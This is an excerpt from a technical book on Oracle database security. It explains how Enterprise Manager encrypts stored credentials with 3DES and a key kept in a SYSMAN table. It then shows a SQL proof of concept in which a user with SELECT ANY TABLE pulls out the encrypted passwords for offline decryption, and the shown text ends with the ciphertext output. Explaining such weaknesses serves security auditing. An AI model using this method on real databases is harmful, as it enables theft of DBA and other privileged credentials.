Database Reference
In-Depth Information
For those interested in the technical details, the code used by Oracle Database to encrypt is as follows:
CIPHER_TEXT := SYS.DBMS_CRYPTO.ENCRYPT(
SRC=>SYS.UTL_I18N.STRING_TO_RAW(PLAIN_TEXT, 'AL32UTF8'),
TYP=>SYS.DBMS_CRYPTO.ENCRYPT_3DES+SYS.DBMS_CRYPTO.CHAIN_CBC+SYS.DBMS_CRYPTO.PAD_PKCS5,
KEY=>GETEMKEY());
The
GETEMKEY()
function uses Triple DES encryption in Chain Block Cipher mode. The key is kept in a table,
described as follows:
SQL> desc sysman.MGMT_REPOS_TIME_COEFFICIENT;
Name Null? Type
----------------------------------------- -------- ----------------------------
TIME_COFF RAW(64)
For test purposes, we can create our own key directly:
SQL> insert into sysman.MGMT_REPOS_TIME_COEFFICIENT values ('1234567890123456789012345678901234567
890123456789012345678901234');
1 row created.
The ability to carry out this decryption of credentials belongs to any user with
SELECT ANY DICTIONARY, SELECT
ANY TABLE
, or plain
SELECT
OBJECT PRIVILEGES on the
SYSMAN
schema, which can gain the credentials of a
DBA,
DBNSMP
, or
MGMT_VIEW
user via grid control. Medium privilege in the EM repo can gain every credential stored there.
That is done by selecting out the ciphertext of the credentials, along with the key, and then installing them in a
test DB, then carrying out the queries above.
What follows is proof of that method:
SQL> create user systest identified by systest;
User created.
SQL> grant select any table to systest;
Grant succeeded.
SQL> grant create session to systest;
Grant succeeded.
SQL> conn systest/systest;
Connected.
The following query gains the cipher text:
SQL> select * from sysman.MGMT_ARU_CREDENTIALS;
ARU_USERNAME
--------------------------------------------------------------------------------
ARU_PASSWORD
--------------------------------------------------------------------------------
C74AD2422A26F1AB3A0FB04C7770C9B123675B65C9695D9F
157781F0E20C9A687EE4E2B7A649346279D11B98FA3DC31F
